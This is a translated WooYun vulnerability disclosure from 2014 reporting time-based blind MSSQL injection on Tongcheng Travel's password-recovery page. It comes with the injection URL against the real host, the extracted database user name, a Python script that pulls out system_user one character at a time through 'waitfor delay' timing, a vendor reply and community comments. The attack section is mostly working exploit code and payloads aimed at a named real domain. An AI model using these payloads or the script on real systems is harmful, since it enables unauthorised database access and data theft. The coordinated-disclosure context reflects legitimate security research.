
Vulnerability summary

Defect ID: wooyun-2014-088834

Title: Same-type MSSQL injection on multiple Tongcheng Travel (同程旅游网) sites (with verification script)

Vendor: Suzhou Tongcheng Travel Network Technology Co., Ltd. (苏州同程旅游网络科技有限公司)

Author: lijiejie

Submitted: 2014-12-26 20:28

Fixed: 2015-02-09 20:30

Published: 2015-02-09 20:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-12-26: Details sent to the vendor, awaiting vendor handling
2014-12-26: Vendor confirmed; details disclosed to the vendor only
2015-01-05: Details disclosed to core white hats and domain experts
2015-01-15: Details disclosed to regular white hats
2015-01-25: Details disclosed to intern white hats
2015-02-09: Details disclosed to the public

Brief description:

Same-type MSSQL injection on multiple Tongcheng Travel sites (with verification script)

Detailed description:

Injection point:

http://17349886.17ujp.com/Admin/AjaxForFindPwd.aspx?IsReseller=0&_=1419585952016&Account=123'; if (len(system_user)=10) waitfor delay '0:0:10'--


The request above tests whether the length of system_user is 10: the page only responds after a 10-second delay when the condition is true.

Proof of vulnerability:

Guessing system_user character by character yields:

17ujpadmin


[Image: 17u_mssqli_2.png]


Verification script:

#encoding=gbk
import httplib
import time
import string
import sys
import random
import urllib

headers = {
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}

# Candidate characters for the user name: a-z, 0-9 and a few symbols
payloads = list(string.ascii_lowercase)
for i in range(0, 10):
    payloads.append(str(i))
payloads += ['@', '_', '.', '-', '\\', ' ']

print 'Try to retrieve user:'
user = ''
# Guess the 10 characters of system_user one position at a time
for i in range(1, 11):
    for payload in payloads:
        try:
            conn = httplib.HTTPConnection('17349886.17ujp.com', timeout=3)
            # Conditional delay: the server sleeps 3 s only when the character matches
            s = "if (ascii(substring(system_user,%s,1))=%s) waitfor delay '0:0:3' --" % (i, ord(payload))
            params = "IsReseller=0&_=1419585952016&Account=123';" + urllib.quote(s)
            conn.request(method='GET', url='/Admin/AjaxForFindPwd.aspx?' + params,
                         headers=headers)
            html_doc = conn.getresponse().read()
            conn.close()
            print '.',
        except Exception, e:
            # The 3 s client timeout fired, so the delay ran: this character matched
            user += payload
            print '\n[In progress]', user
            break

print '\n[Done] User is:', user


This appears to be a wildcard DNS setup, and the same injection was found on many other *.17ujp.com hosts.


Fix recommendation:

Filter the input.

Copyright notice: please credit the source when reproducing: lijiejie@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2014-12-26 20:55

Vendor reply:

Thanks for your attention to Tongcheng Travel; a fix is already being scheduled. Thank you, Sister Li.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2014-12-26 20:31 | CoffeeSafe ( Regular white hat | Rank:142 Vulns:37 )

    Front row!

  2. 2014-12-26 20:33 | 疯子 ( Regular white hat | Rank:242 Vulns:42 | The world laughs at my madness; I laugh at the world for not seeing through it~ )

    Front row!

  3. 2014-12-26 20:38 | Tuniu (途牛旅游网) (WooYun vendor)

    Let him go, come at me!

  4. 2014-12-26 23:54 | 0x_Jin ( Regular white hat | Rank:319 Vulns:37 | Weibo: http://weibo.com/J1n9999 )

    Sister Li, you're here again

  5. 2015-01-06 09:27 | wefgod ( Regular white hat | Rank:1807 Vulns:179 | Beyond my ability )

    Sister Li is just awesome

  6. 2015-01-07 14:58 | 帅气小狼狗 ( Passer-by | Rank:8 Vulns:2 | Woof woof woof )

    @Tuniu are you two best buddies?